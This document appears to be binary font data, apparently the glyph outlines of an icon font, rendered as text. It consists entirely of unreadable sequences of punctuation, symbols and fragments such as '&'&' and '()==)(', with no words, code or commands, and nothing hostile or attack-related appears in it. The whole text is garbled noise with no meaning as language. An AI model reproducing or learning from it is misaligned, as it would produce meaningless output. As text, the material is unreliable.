(= < P   P       /%  A6 \  XM!@-$ > ;>o P    PM`67167&'&'1'&'&?6?632/&/'&/&?#"#"'&54?1%1#"'&54?#"'&5476;'&547632'&'567&'567&'567&'567    /  / #"   2 G  (= < P   P       /%  A6 \  XM!@-$ > ;>o P    P0000L_y67167&'&''&'&?6?632/&/'&/&?#"#"'&54?1'/&'&?676761`    /  / #"   2 G  (= <F ,@ 7 ? 6        /%  A6 \  XM!@-$ > ;>F Mo   o  8 *<L#"#'"#&'54?5'54?5676711&'&'6767''&?6'&1@M# nn :@()==)(()==)(c= ( H bT,%&.)#" ) +G1B iT=)(()==)(()=+< ( H *<EP#"#'"#&'54?5'54?56767167167&'&'67&''675&'@M# nn : ()==)(()==)(bT,%&.)#" ) +G1B iT=)(()==)(()=`PP*<U#"#'"#&'54?5'54?56767167167&'&'76'&'&?76/7@M# nn : ()==)(()==)( %% $$ %% $$bT,%&.)#" ) +G1B iT=)(()==)(()=% $$ %% $$ %%-LY67167'"#'"#&'54?5'54?512+"'&=476356767"1354'&#f@:nn :P"  " @ bT:#G+ ) ) +G1B iTb"0   0"0 00 $/>M]l|&'&'567'#&'673#&'673673#&'767&'&'5&'&'5671&'56767'&'567671&'5676747163!2#!"'&545&'&'1""00 pph00""""""""`""  *  *P""0H`""@""`"" "" "" .!"   "!.@ :Ld21#5476;21#5476321#5&'&'5"'&54763!67167&'&'7;?6'&+76'&1` @  @ @ 8##@8#$ @@()==)(()==)(`$`$ `` `` ..=cc *+;  =)(()==)(()=RH6H6@ :L\21#5476;21#5476321#5&'&'5"'&54763!1&'&'6767''&?6'&1` @  @ @ 8##@8#$ @()==)(()==)(c= ( H  `` `` ..=cc *+;  =)(()==)(()=+< ( H @ :LU`21#5476;21#5476321#5&'&'5"'&54763!67167&'&'67&''675&'` @  @ @ 8##@8#$ @@()==)(()==)( `` `` ..=cc *+;  =)(()==)(()=`PP@ :LW21#5476;21#5476321#5&'&'5"'&54763!1&'&'6767'#367&'` @  @ @ 8##@8#$ @()==)(()==)(P `` `` ..=cc *+;  =)(()==)(()=@ :Le21#5476;21#5476321#5&'&'5"'&54763!67167&'&'7&'#3675367&'#5` @  @ @ 8##@8#$ @@()==)(()==)(0000 `` `` ..=cc *+;  =)(()==)(()=A0000@ :Le21#5476;21#5476321#5&'&'5"'&54763!67167&'&'76'&'&?76/7` @  @ @ 8##@8#$ @@()==)(()==)( %% $$ %% $$ `` `` ..=cc *+;  =)(()==)(()=% $$ %% $$ %%5Ka1/'&57'&76?63221+"'&=476;21+"'&=476;4716;2+"'&=& // &44       %45%00   @   ` @ @!&<213#"'&547631#7373#7!3#7547632#"'&=#7  UU  J`J`J`J`J`J`u   UU    6  *5[`!2#!"'&54763675&'&'675675&'!#3+"'&=&'&'535#"'&54763#35`  h00X(()   )H( PP @  @@@@@@@ @@`)@ @)`@  @@@ >P`33276=32&#"54'&#"327#"#&'&'47676311&'&'6767''&?6'&1K  K+-%&   v()==)(()==)(c= ( H @ @ x#+ @  @ L =)(()==)(()=+< ( H  >PYd33276=32&#"54'&#"327#"#&'&'476763167167&'&'67&''675&'K  K+-%&   v()==)(()==)(@ @ x#+ @  @ L =)(()==)(()=`PP >Pi33276=32&#"54'&#"327#"#&'&'476763167167&'&'376'&'&?76/K  K+-%&   v()==)(()==)($ %% $$ %% $@ @ x#+ @  @ L =)(()==)(()=% $$ %% $$ % 1Edq13276=32#54'&#"#&'&'47676;4'1&#"3276=712+"'&=476356767"1354'&#  K,  vJ@   "  " @ ` @ V-%@ @ L @ @ @ "0   0"0 00 [26716567656765676!51#!"'&54767!@ c c c     @K        #(L#&'6735#&'6735#&'6735#&'6735#&'67;!!#3#3#3#3#3P88 `88(  (0(  ( /H&71673#'11!&'&'676767016730316'&'&?76/7 //)* )) )*/0//0/..  GGo"#78R))R87#"//0/../05BO^p&'&'65&'&'27#13!&'&'476?63675&'#3675&'#73#&'5671&'&'6767'&?6'&} &%-;,%%%$@  }     @()==)(()==)( ( H =^ ^#!%%& ):` # ] ]^@@@@ =)(()==)(()= ( H <5BO^py&'&'65&'&'27#13!&'&'476?63675&'#3675&'#73#&'56767167&'&'67&''675&'} &%-;,%%%$@  }      ()==)(()==)(^ ^#!%%& ):` # ] ]^@@@@ =)(()==)(()=`PP5BO^p&'&'65&'&'27#13!&'&'476?63675&'#3675&'#73#&'56767167&'&'376'&'&?76/} &%-;,%%%$@  }      ()==)(()==)($ %% $$ %% $^ ^#!%%& ):` # ] ]^@@@@ =)(()==)(()=% $$ %% $$ %@0BO\iv3#3#5&'&'#&'&'567673754763116767&'&'3675&'#3675&'#3675&'#!3675&'# pPZf  fZ       p      0@p  p@@      @@P@@0@@@@7DQc3#&'567'6&'&'#13!&'&'476?3675&'#3675&'#767167&'&'712+"'&=476356767"1354'&#P "}  00 @@  }    %%%%"  " @    ] b/  /%` # ]@@@@%%%%H"0   0"0 00 #.267167!#"#&'&'7&?6'16'&?53  ` ` ` u  ` ` 6 뀀-;767&'3&'672#"'&'&'&76?631'67675#q8 11`  _21!@)*@AW2JKII--IIKJ2W@))@$=K%&'67'2#"'&'&'&76?6315367675&'#'&'#"'1'3276=#  11`  _21_0"@ -  0W2JKII--IIKJ2W"@@" @n0 @32#"'&'&'&76?63176'&'&'&'&71 11`  _21 b ` W2JKII--IIKJ2Wc c -CN67167!!&'&'67576=&''&1675367&'#5367&'#7&'675@@B A 000@`@Pfn  fn  P 'H1!&'&'6767!16767&'&''&76?367675&'&'@     ) 0 6@@    * `  87f;0s7471632#"'&5&'671!&'&'6767!1'&766767676'&76767&'&'&76'&'&'&'1   xh@  @@Vaj3#5367&'#3#5367&'#&/#"'&'676;'#&'&'67673'##&'&'67673'41056763210&'67A))((D()), (  $(")#j ))P))P  )$_   0CU1#"'&547632'276/#"/'&?'&54?'&76763167167&'&'32#!"'&54763!54'&#"&'&'675676756767&'&'6754'&'   9 8 8 9 9 8 8 9 Xh      """        8 9 9 8 8 9 9 8      !! !!!6 !! 6  @(,%#"!&'&'6767!%271654'&#"353@    ` `   @5GK671676&'&'1367673#"!&'&'67671271654'&#"353        `\     @6+'!"'&76?           48/&765476376162#!"'&5476;76?3' PP ' ){    MMPH H $z z$    ǀ@"9'&?!/&54?6!'&76+'#"'&?6?68P "m! PP !" P]  `a  r H  H H  H   @ 7!&'5&'&'!/&54?6+'#"'&?6?6Wq3""! PP !  `a  x""3(( H H    8+B/&76567761!/&76567761+'#"'&?6?6 PP ((` PP ((W  `a  PH H $zz$ H H $zz$    )6+'&/&'7+'#"'&?6?6     a`    ) z   @ '47163!2!5&'5#&'!&'675  @@@  @x@@@ '5DO21!5476;!&'5#&'675&'%21!5476;!&'5#&'675&' p    `x@@   `x@@@5X]as1'&'&5476761!61'&'&7654'&76711'&/#'&'&7&56767/#3'3'''&54761!'&767&'&761?      $    lwL&&b    @     '--&  2::2  2::2  &--' /  --  .S `SS #''# '#  #';?EIMX6+32+"10+"101#"'&5476;7#"'&=&'&76?'3'7'#7'''367&'#    E _` E    I;:uz??t .#n- "vP P   P PC11557C&&C"/<IVc67167335673!&'&'3675&'#3675&'#3675&'#73675&'#3675&'#%##"'&=#&'&'67&56767  ` (   @           "  #))  HH   @  0    0    )# #) ))%%'&76767&54?632#"'1XcB  P Ac _`  cA P  Bc  `_ !7Mc3673#&'#/&'6?614716;2+"'&=21+"'&=476;!21#!"'&=4763!YX  XY/    ` ``   H  H `  `  @ @ @ @ @ @ 28J\q67167!322+&'&'#&'&'#&'&'5'#367167&'&'%16767&'&'&#3?6/ @ 3M  ))))  M3    @    ''PP  0Ms  )))) @M`    `    ('PP28J\q67167!322+&'&'#&'&'#&'&'5'#367167&'&'%16767&'&'%67167&'&'&1 @ 3M  ))))  M3    @       0Ms  )))) @M`    `    `!! !!BGYk6716733;2+&'&'#&'&'#"'&547635"'&=47675'#367167&'&'%16767&'&' %4)5  ))))   ++V    @    `$w  ))))  ` ``    `    CHZl3232+&'&'#&'&'#"'&547635"'&=47635676733'#16767&'&'67167&'&'&6757675&''&'67675&'&'5@%4)5  ))))   @V++    @     # #}  $w  ))))  ` ```    `    )  `+4  `+4 @  @@@'GQZc1''&=4?5'&=4?56767167167!#&'5##&'5&'53'&'#167&''67&'Z[2{   Pja"! (R%@ QkZ  ! +((+ !O110 ':Kbt67!!&'67!!&'1&'&'67676716732#"'&51%6;+&'&'+"'&547676;271&'&'676747167&'&5PP`V ` R 3  0 ` """"0H  7   0 /""""$5L^p1&'&'67676716732#"'&51%6;+&'&'+"'&547676;271&'&'676747167&'&521#!"'&54763!`V ` R 3  0 ` """"n  @`  7   0 /""""    !,>\o~/&76%6'&?76'&71%&76/%67167&'&'65232;23231#&'47671'47167&'&512#&'67673#&'6;1'67167&'&'pHGHHHGHH P'(    [ 8F*84 Fe    qGHHGH0HH'HHb "  % r    P P5    "0HZl1&'&547676716732#&'1%6;#&'1#&'4767232;2323171&'&'676767167&'&'%1!&'&'6767!13!27654'&#!"    F 8+ F84)(P     ))@))  @      /5 &  & p    )))@)` @  #2@Wi{&'5476;#47167&'&512#&'67673#&'6;1#&'4767232;2323'67167&'&'1&'&'676776732&'5#&'3#"'&=67!3567+&'670 hXP    [ 8F*84 FU(P)     `h XPXh X h8h X(    P P5 & &      hXH hXXh $6F4716;2#&'&'"'&5135#1&'&'6767''&?6'&1  3) `@@()==)(()==)(c= ( H   ,9&!') ``=)(()==)(()=+< ( H  !JO21#10310#9"301"01"31401025"101&'&'"'&5476;5#3776'&&'&'&'&76'&'&'67676'&76767671271654'&#"367&' +) @@@   @  o)  ``    _qz'&?60/#"/#"'&54?'&54?7'&54?7'&54?76676&/67167&'&'67&''675&'XXY .$ +#&' E E     .9  ;-F+ ()==)(()==)(@XWf )2" ! E D &&!* '& * &'.:!! ;/ 4 =)(()==)(()=`PP =F671673&'&'54'&#"&'&'567673276=#&'&'767&')&&'&::&'    '&::&'  )x`)&:&''&:P   :&''&:P ) 'AZt21#!"'&54763!21#!"'&54763!%676/'&?'&7176/'&?'&767676/'&?'&71`  @  @7766777797667877887667877     77876678778766787777876678@L1&'&'6767"'1&?'&'&?67'&/+#"'&=##"'&=# :%::%;     ]%  O,,O  %]P PP PoJ1&'&'6767276?676#"'&=##"'&5&/&767631d -   + $j  + `` *   !6'1&'!#367&'&'#57'!D0  /*ְ  ֛-%1&'&'676725&'&'6767254767%632((())( ? Q"!"L"""  _ .%'6'&'&'&7327654'%67167&'&'w* 11FE87 10FS>x  [%$66%$$%66$%x>SF01 78EF12 *w  6$%%$66$%%$65676767676#"/&'1!!4"!!  !#4!!/  /6&'     '&6A, ,A(/'&?'&76?67} hh@  @*f DD f$767167&'&'#3!2765&'&'6%$$%66%$$%63fI11 z 11I$%66%$$%66%$011I I11 !.;HUbo|!!67654'&'#&'56735#&'56737#&'5673#&'56735#&'5673#&=673'#&'56735#&'5673`   0/0/0/p//////   ` 000000````000000$)1!&'&'6767!#35#35'5#335#ࠠ@@@ $).38=B1!&'&'6767!#3535#7#3535#7#3535##3535#7#35XX8XXXXXXXX@XXXX8XXXX@@@@@@@@@@@@@@@@@@@@@@@@@@@$).367167!!&'&'35#%!!535#%!!535#%!!5@@@@@@@`@@@@@@@@@@@@@@@@@ `1#"/&54763276321 h W j  @`)%1#"/#"'&54?'&54763276327 ii jj ii jjW jj ii jj ii7%'6'&'&'&7327654/#&'5#&'67356723w* 11FE87 10FS>x  999 8x>SF01 78EF11 *w  888 8'%'6'&'&'&7327654/#&'673w* 11FE87 10FS>x  ԡx>SF01 78EF11 *w  I%1#"'&=47632#167674'&'&'&7676&'&'&'47676   21KK12  ( 66CC66 (    K1221K)## "/07D66  66D70/" ##)@';Oc"1327654'&#"13276=4'&#"13276=4'&#"1327654'&#"1327654'&#           ?   ` @ A   b `   Qc/#"'&/&''&/&'&?&547'&76?6766?6763276167167&'&' ,,   8  8   ,,   8  8  """" ( (   99   ( (   99  #!!#@K%1#+"1&&"1#"'&=4'&+"+"#01"+"'&=4=#&'&547%621@  9 @ 8      X X pE   +&'1&'1&'67676776/5&'"H9:"""":9HH9:"""":9H ` U @"":9HH9:"""":9HH9:"" @ 9{ @/C13276=32#54'&#"#&'&'47676;4'1&#"3276=  Kv  vJ@   ` @  @ @ L @ @ @$G%##"/#"3!276=4'&#&'67'32?654'&#"54'&#"'&#".-  0 I  I `-- ` ` hQ J J &'!!676754/#'#7!#=  =_ 7007 `  `@@ @+"'&5476;&'&#276&'&'&'6767672547632  ?!!&D----D5+  >32(F 1c"1&'&#76767672#";276=4'&#&1"'&'327654'&+"3276=367676'&' ..6H87 ''3&! ,   ''3&! ,   -.5H87  J*()D  0    0   J*()D @'9KVal67167!!&'&'4'1&#"3276=4'1&#"327654'1&#"327657367&'#367&'#367&'#@       @`@  `    ``+567673!&'&'56767;5&'&'P()==)(@""0=)(()=00""0*#&'47632"'&'&'"637674'&#@    C)*"$4$50%6-.50@ 0 0  -6%&'&'567672&'&'63&'&/6767673"   99QQ99   """::GG:9"#p"  P2332P  "pG::"""":9G@#"/#&'&'5676;76@ T  T x a x +&32767&/&#;72767&'   ""pT  T  -- x _ x  )D]&32767&'7&3276765&'7&32767654'&'&#332767&'   ""< 4  "E= **  33T  T  .-J  A.&&,Y:K #006601# *::BB99* x ` x  05KPUZg1#&'&'567673#351#&'&'567673#35671673#&'&'535#3#5#53'3#5##5335  `  `@@  `  `@@ `  ` @@@ ` ` @`@ `  ` @@@ `  ` @@@  `  `P@@ `  $1>I#&'673&'677#&'67;#&'673673#&''67&'(XH`@p`ppp`(32#"/&=67671271654'&#"30 @      ,>1'&?654/&765676732#"/&517"1327654'&#''pp' p  *66*qq##> v   $/;%&'&'!!2765&'567%3#&'673#&'67!"'&54763! ))@       p  ))  R@  @ '6767!   0pp   %.A!;3!276=3276=&'&'!5!7&'67%3354/&#!"35  @  @0@ .  @` ` ` ```ES . `/33!&'&'67673767167167&'&'z" KK "=))))))))/3%#&'#";27654'&+731";27654'&#'7#  `  ` 88p k   00   p#/;%67&'&'#";#";67674'&/3#5#53A%$6  6$%pp"06$%   %$6#)1+32+"'&5476;#"'&5476;2 ;@  ;@     @  @4g!"3276=3#";27654'&+33276=4'&#5327654/&#"32?'&#"32?654'&#"   @    @   @ @ @ @  @    @  @ @ @ @ @ 4h!"3276=3#";27654'&+533276=4'&#"#7654'&#"327654/332?654/   `   ) @ @ @ @ ?    ? @ @ @ @%9L#"'&5476;2##"'&5476;2#%47163!2#!"'&5!"'&54763!2#         `          %9L#"'&5476;2#!"'&54763!2#47163!2#!"'&5%#"'&5476;2#@  `  `   @  `       `   %9L#"'&5476;2##"'&5476;2#%47163!2#!"'&5!"'&54763!2#    `     `          %9L!"'&54763!2#!"'&54763!2#%47163!2#!"'&5!"'&54763!2#    `     `           4HUb#&'567321#!"'&54763!21#!"'&54763!21#!"'&54763!%673#&'5#&'5673X00         000H0000       0000(<Q_47163!2#!"'&514716;2+"'&521+"'&5476;47163!2#!"'&515&?6/       `   f  f    `      O O';O^47163!2#!"'&54716;2+"'&521+"'&5476;47163!2#!"'&57'1&'5676       `     f f    `     d O O@!!&'&'6767!/576     nnP      KK &<!!6767&'&'1&'&'6767#!"'&?6327632   O F ^@@     `, 11#"'&'&'&'67671''  ('66RR66-;;78! !87;;-R6666R$%11&'&'&'676767%6767&'&'"":9HH9:"""":9HH9:""R6666RH9:"""":9HH9:"""":9H66RR66p+767167167632&'&'3&'67&'&'&'##  ##21KK12` 0"&9888% %8889&L1221L0 # N1'76327'&?67171+3!276=4767!&'&'67673b¨b X   `   )))`bʨb  X     a  a)))h%#"'&54?#7632#"/&5476325##"/&54?63235#"'&54?632#"/3'&547632 H  s  H H  s  H H  s  H H  s  H H s H H s H  H s H H s H @#"1367654'&#767&'&      ?   @ *7476327676//#"'&5    !?      767&'&!767&'&̬ yT ?  @ %'&'676i   ` @)#36767&'&'+;6767&'&'                   !&'&'56767!@ ?5'&7!7654/&75 T    *#"'&='&'5'&'6765676547632    `   ?   >#%271654'&#"3'7654/&7    ?     "7!676/&#"!!67654'&'0_  _  _ A    "/&54?632# @@"'&54?'&547632#` 3767167167&'&'&'675367&'#5&'#3"":9HH9:"""":9HH9:""@@@@H9:"""":9HH9:"""":9Hp@@@@%767167167&'&'&'7367&'#"":9HH9:"""":9HH9:""H9:"""":9HH9:"""":9H4767167167&'&'&'7?76/76'&'&1"":9HH9:"""":9HH9:""///0..0/H9:"""":9HH9:"""":9H0/0..0///4767167167&'&'&'%6514'&#"'&#"32?"":9HH9:"""":9HH9:""t l, @ H9:"""":9HH9:"""":9H, l, @*K11676767&'&'&'"'1&5672#7&'54?65&'#&'67673H9:"""":9HH9:"""":9H  E- 9 33""":9HH9:"""":9HH9:""p    " &,B11676767&'&'&'21#"'&54763#&'6735#&'6733H9:"""":9HH9:"""":9H  (P "":9HH9:"""":9HH9:""   @XL7471632#"'&52132+#"'&=&'&'#"'&5476;67675476315476326767#"'&5476;&'&'#"'&=32+    H11   11H  H11   11H   ,   ,  ,   ,    11H  H11   11H  H11  k  ,  ,   ,  , $0%11&'&'&'676767%67&'1&'671"":9HH9:"""":9HH9:""d#66R?0\66R?0 "H9:"""":9HH9:"""":9Ho0?R66" oR66#0?#%1#!#"/&54?632!2 j j3  i i "%#"'&54?!"'&54763!'&547632 j 3j i  i "%#"/#"'&5#"'&54?632w i i j 3j "%#"/&547632476327632w i i j3 j "%'&'5"'&'&'6767635676 u./! "&&AAQ ޗ W'(k *)/K((P  1Jd#"3276=327654'&#!#";3276=4'&##54'&#";27654'&#%"1#";276=4'&#`  @  ` @  @  `   @ `  ` @   @ ` @ `  ` @  ` 1Jd7#";3276=4'&#!#"3276=327654'&#'327654'&+54'&#"3'"1#";276=4'&#` @   `  @ `` @   @ `   @ ` ` @   @ ` @  ` %!"'&54763!2# `    %711676767&'&'&'67&'5"'1&547632#H9:"""":9HH9:"""":9H "":9HH9:"""":9HH9:""   )7FOX3767332#!"'&=476;&56767&'#";'7#327654'3#&'&'553#33% * @ * %'  I" #I   *))*% @ @ %E  ;;    51#&'&'"'&767676767&'4767676767632//P"1*)' !HHzP<;) ##2+&+))bHI ,(!!65// 3$# ):C2&'676767&'&'&'&'4767017D ):K..32??23""7!,8%%%: %96GMN8@4444@+CC6!!:+B )++@?Q23&'&'456767&'71&'&'&'&'&7676767671'16767&'&')))#  #$00==00$#  #$00==00$=)(()==)(()= )))/!## #""""""# ##!""()==)(()==)(7R67167'&7665&'236365&'&'&'1&'&'&'&767271!*+3=00$#  i  pHZ) (()=9(a=00$# "^()=I6Hc"!##  R  X9F )'<))%"""# $.J >)( :.%&#"!676'%67"'&="'1&547632#    l   @-1##&?#+&'4?'&567323'&733te 81g+*  *+g18 et:nn :"/<IVcp}35476323!567673547632!!&'&'3675&'#33675&'#73675&'#3675&'#73675&'#3675&'#  0 @ 0    @          p      00     p    0    0  0  !7G%&1#'&+";;?6/3?6/&#"7#";2?'  0 ` P @ OPX0 OO ? ('+P ` ((* 0  0 PP0 PP 0 658  658$11367673676767&'&'&'H9:""7 2$#1:G:9""""9:G//:L7'//:://(6676753&'&'&'53'4716;2#5!4716;2#5))32??23 @ @ @  `))``?2332?`` @@ @@``%"/#"'&54?632# `   7"/&5476327632# g"E%&'#5&'&'#";#32?6'#&'53676/&#"3327654'&#f0" 0 P P ʀ0 P P 0" q"   PP  PP "  =.@!!!!&'#&'67367167&'&'!1&'&'6767` 6 4<4H           0=0        !&'&'676733 `  @ 0  ` @ ?!5&'&'#'#767!!6?6'&'L @ ['u w ` 0 @ " 27#"/&547632#"'&54?632#"/7632 ` ` )) ` ` )) W ` ` *&* ` ` ** @@2%#"'&54?!#"/&54?632!'&547632` ** ` ` *&* ` ` )) ` ` )) ` /CW21!2#!&'&'47634716;2+"'&521+"'&5476;21#!"'&54763!   p" `          "P `  @   `   -?5673376;!&'&'6767+36735#16767&'&'@@ 3 s!,,!s2#%%%% 9@`_%%%%"4%+##&'54?&56767"'7271654'&#"3" ((P21KK1221K^  h ((P K1221KK12   x\n/#"'&/&''&/&'&?&5&54747'&7670?6766?6763276'132767&'&'#"''&/&'&'&?&/&'&5476?67'&7676?0767663276/7&'1&'6767          ~    E                  %                            ~    @&'1&'367676767&'&'01"167276'01&'&';;XX;;) :%/:X;;'66R34Q22E3*%6 K1221K<-21K.>K12K77:%%%'&?'&76?67"#3 h@ D fHH&I7#"'&5476;27654'&+327654'&#%'&#"#";32?654'@ @ @))@ W J J   ))  I  I %147163!2+#!"'&?6?#"'&5#"'&=3   9  9   @  @ @ ` `2X4716;010123010101#"'&=#"'&54?#"'&516716732+!547632!&'&'   3 ` `     3 @  ` ` &I#";2+";6767&'&''&#"#";32?654'@ @ @ @))I J J     ))ɀ I  I ?@MY&'#45&'&#!"#+3674'&'#"'&'6767676'&'&'1&73&'!67673<e e9     8Q I$$I Qn $%(T!      !T(%$ .12,44,22- #AJ312?3276=327654/&#"#&'&'#"3!276=4'&#&'67i I  I w  0 J J  ` ` h)=&'1&'&76767676'&76'&'1#"#&767676++66=:  ++66=:  #$#    )*,  :=66++  :=66++L #$# ,)* %&'&'&'6?676gg=>e .5))4,l=e>=ggl+4))6. /!!6767&'&'&'&'&'6?676@  @43 3  5 7 @2 34@   7 5  /3!&'&'56767356767'&'&'&#()=,""  "0=)(%   "0@ &11!56767!1!&'&'5!%367&'#367&'#@@@0@@ @ 6H230167&'&'&'7"1332765&'&'&'167674'&'=43! '&==I bPO//  87^^t !33>I=='&  //OPb t^^78&8I%!!67675&'&'"'1&547632#3"'1&547632#!67!5&'&'`      `  0`   `  `        3A1/&'&++"'&=&'&'567673276?6#32#1 +%./3 @ 3/.%+ <77--77<  -$ `$,  `((H7676//'&/'&?'&'&?'&76?'&767676, > ?  ..  ? > ,- > ?  ..  ? > -.  ? > -, > ?  ..  ? > ,- > ?  .!1Es71;27654'&+"7327654'&+7327654'&+4'1&+";2765'&547&'&'567276=4'&+3&54767 @ @ ,T P 0 @ @ v    ?5 '&:!   @  ( `  8  < I  F   *$$,Y:&' 1Dr%#";27654'&#'5#";&=47145#";5327654'&+"373676754/&'#"36765767@ @ P T @ @  !:&'!4?      8(    8   '&:Y,$$*   F  I  !1Es%2716=4'&#"3'54'&#"32'54'&#"236;%"13276=4'&#"'#&'67327674'&+";67675#"'&'   @  ( `  8  < I  F   *$$,Y:&' @ @ ,T P 0 @ @ u   ?5 '&:!   1Dr%3276=4'&#"#3276=+"'1"#3276=#54'&#"32765'25&'&'#";2765&'&+&'6736326763   8(    8X   '&:Y,$$*   F  I @ @ P T @ @  !:&' 5?    =11676767&'&'&'##"/&7&?63232#H9:"""":9HH9:"""":9H2 h  g 1 "":9HH9:"""":9HH9:""1 h g 0  =11676767&'&'&'#"'&54?#"'&5476;'&547632H9:"""":9HH9:"""":9Hg 1 2 g  "":9HH9:"""":9HH9:""g 0  1 g >11676767&'&'&'#1"/#"'&=#"'&54?66H9:"""":9HH9:"""":9H 1  1 g g "":9HH9:"""":9HH9:"" 2 2 g  g =11676767&'&'&''/&5476325476327632H9:"""":9HH9:"""":9Hg h 1  1 "":9HH9:"""":9HH9:""g  h 2 2  ,5@OYb%#&'6737#654'3'#&'+6767661!67167##&5473&'3''&'1&'1&'3136731`{{ t(<-,   ,-<(tp{{@  <-,t((t,-% 8""""> %,,,, &&8  8&&""""8'%38"""" 3%'n7o6312'&'&?6'&'&#"?6'&'&54?#1"'&'&?67632?654'&'&'&'&76?6,9:,&  p  .33'**q'-:9-&  q  ,34'**p=**'44,  q ! %-9:-q**'34,  p!  %-9:-p#745676763!&'&'6767`--D-$$),$%6=)(+D--$) #"/6%$()=0$$%%'53675&'#3!676'%76=3#vu+2+0@0,%"##"%TN N,>PZ6312&'&'67677'#&'&'67677&'1&'3276767167&'&'?#"/  00  0&&0  00 &    0    @ v 0  00 )& 00  0&<        i@ v15#367675#"'&573'5#367675#&'&'p   _ ``    ``    ```   0F"32?632#"'&54?632#"'&54?632?654'1l !++! 3AA300%//%##  l!++!  003AA3##%//% )6'&'&+!67675&'&'1&'67677#&'5673T @`?T``67167!!&'&'@`@':47163!2#!"'&547163!2#!"'&5!"'&54763!2#       `       %9M_q67167&'&'%21#!"'&54763!21#!"'&54763!21#!"'&54763!67167&'&'71&'&'6767             0    `    `                   ' ?Sg{4716;3#"'&5476;5#"'&51&'&?6763#&'&?6'121#!"'&54763!21#!"'&54763!21#!"'&54763!7 P   @  #!X H       x `  &  N        C%'&'&7676'#7#&'&'&7676767676'&'&#!67&'L12;  *+0-&/  N?%$D  E*  q   8#P  $,1&M%!"3!27654'&#367675327654'&+";&'&'5327654'&+"3  --DD-- ` )) `    D-,--C   )(  $)1!&'&'6767!5#335#35#75#3ࠠࠠ@``@```````&5147632#"/7'}##Nii}##ii28J\1322+&'&'#&'&'#&'&'6767!35'#16767&'&'67167&'&'p 3M  ))))  @0M3    @     0Ms  )))) @ `M    `    @%,3E1!&'&'6767!&'1&'3'67167#53#567167&'&'@@@@@@))))@@@@))))@?%#"/&76737    ɀ ?@?632#&'&7     `7'&54?6' )     @!`'&'5676w W  67167!!&'&'3##3@`@@7!676/&#"!32?6'&'    @@%#"/&767!8   q@7!676/&#"  %1/&'6767!312?!&'&'5      УB%11&'&'&767636767&'&'"32+"'&=47632676322?J<  +5D----D&!!?   .-5?22>32,  --DD--   F(23>,C%4/&#"'7654/&#"32?32?65&#"32?654'7' r } q | ; s . s :- q  } r } ; s . s ;.73'&?#&'&7%6o Mq  L  @m671673#33#&'&'5676735&'#3#&'&'5676735#3#&'&'5676735676735#&'&'5 @    @    @    @   p  @ (  @  @  ( @  @ (  @  @  ( @@N7&'&'&367675&'%&'1&'54'&#"76767671767676'   #AGGZ  ZFG')(' !  &)('   #  g;;   ;;g*BB*$(?5&'&'#&'#367673'&'673'5#367675#"'&5@ 9%%9  "0`` p   ` `   "(````    p-?36?675#110130105676767&'&'1&'6767p > OM10+  +22K" 0    ''23GD0/EJ21`!/ "E!32?654/&#"!"3!7654'&#"327654/!27654'&# s: p p : : p p :s 9 p p 9  9 p p 9  $9&'1&'676745676763!7?6'&5&''&=)(+--D-$$),$%6P'(P ()=0$$D--$) #"/6%$XP''P$9&'1&'676745676763!7?67576/&=)(+--D-$$),$%6O('PP ()=0$$D--$) #"/6%$&&PPgt1&'&'6767176/567632?6=4'&'5#!"'&=676767674'&'5012;2301"'&54763`%$76$$$$67$%A     8$#  #$8  px  @6%$$%66%$$%6   5,,= <-,=B:>  0IR1&'&'67675&/&&'&'576/&676756765&'&'&'67"  0. 7$$?()?$#812IK12 "P" O,* *+< z(){ ;++ E../0GO "h +3#%#!&'&'#533#36767&'&' 00 P  00  0   P `00   $.!&'&?67567675476321"'&53#8#$0    /#$8   ++;I6  6I;++   "1!3676736767&'&'#53!!6767&'x)) 6$%%$6 0  ))%$66$%  5Pl671673#5&'&'##336753675&'#5&'##&'&'5367&'#5367&'#567673!1#3#3#3  P  Pxp PPPP p PPPP pp  0P  P ` @0  0@ 28J\y1322+&'&'#&'&'#&'&'6767!35'#16767&'&'67167&'&'336753675&'#5&'##p 3M  ))))  @0M3    @    0 00 0 0Ms  )))) @ `M    `     00 00  +0M3#%#36767&'&/&'1&'##!#5#3#5##&'5#&'567356733    P   @ Р8088080  0   0  0000880880CN673#32+3#&'6735#+"'&="'&547635476;235#&'1367&'#pht ff thp 7     7 P@@&&7 @  @ 7  +6AJ#54'&#!"3676757676=&'&'&'5673&'5673&'5677530  Q "@@ 70`   $ c"] c-!!6767&'&'&'5#&'5673567@0@PPPP.1!&'&'6767!675367&'#5&'#3@@@@@@@@@@1?654'&#"327654/37654'&#"327654/M  17'&#"32?654'3'&#"32?654' נ 2?327654/&#"32?"32?327654/7 Ɋ  1732?654'&#"'&#"7'&#"32?654'&#"  7"/&54?632#  7"'&54?'&547632#@ `@%"/#"'&54?632#` ` @ 7"/&5476327632# @ !!3&'&'!3!!67675&'@ ` @`  &!!6767&'&'"'1&547632#@  0   p&!!6767&'&'"'1&547632#@       `   0    ` A7"5676727654'&#6767&'&'!"5676727654'&#6767&'&'` 6$%))) 6$%)))  %$6`)))  %$6`))) `!C127"367675&'&'&'1&'27"367675`)) 6$%)`))) 6$%`))  %$6`)`)))  %$6`#5GZl1&'&'67671&'&'6767%67167&'&'!1&'&'6767&5147632#"'1#1"'&5476326312#"'&54710                KD    `            &%11&'&'&'676767"":9HH9:"""":9HH9:""H9:"""":9HH9:"""":9H4FX767167167&'&'&'&67676'&&'&'17"1327654'&#271654'&#"3"":9HH9:"""":9HH9:"" )* !       H9:"""":9HH9:"""":9HF       @   5GY767167167&'&'&'6716776'&'&'717"1327654'&#271654'&#"3"":9HH9:"""":9HH9:"" ##   ""..""        H9:"""":9HH9:"""":9H ((   @   ,>I767167167&'&'&'7271654'&#"37"1327654'&#367&'#"":9HH9:"""":9HH9:""     H9:"""":9HH9:"""":9H   @   +=O!!6767&'&'#&'5'&'6735673"'1&547632#7"'1&547632#R6666RR6666R     @  66RR6666RR66    @   `   @!.;HUbo|%!&'&'6767!5&'#36735&'#36735&'#36735&'#36735&'#3675&'#36735&'#36735&'#36735&'#36735&'#3675&'#367!5&'#36735&'#367@ (  ( ` (  ( ` (  ( ` (  ( ` (  (  (  ( ` (  ( ` (  ( ` (  ( ` (  (  (  (    ` (  (  (  (  (  (  (  (  (  (  (  (  `(  (  (  (  (  (  (  (  (  (  `(  (  (  (  (  (    )lw"'&'&'&14'&#"367567674'&#67#"'5"#"#&'&'5'"#576767557676322352723567'5"'&' A')!#11T   L44,,4-? /!&*"&#-&! $' %&* !, " 0p" - QR J C L E ? R? B E B D@P S @-&5147632#"'&54?'21#!"'&54763!    i   -G'&'&76761#"'&54?'&5476321#"/&54?6321  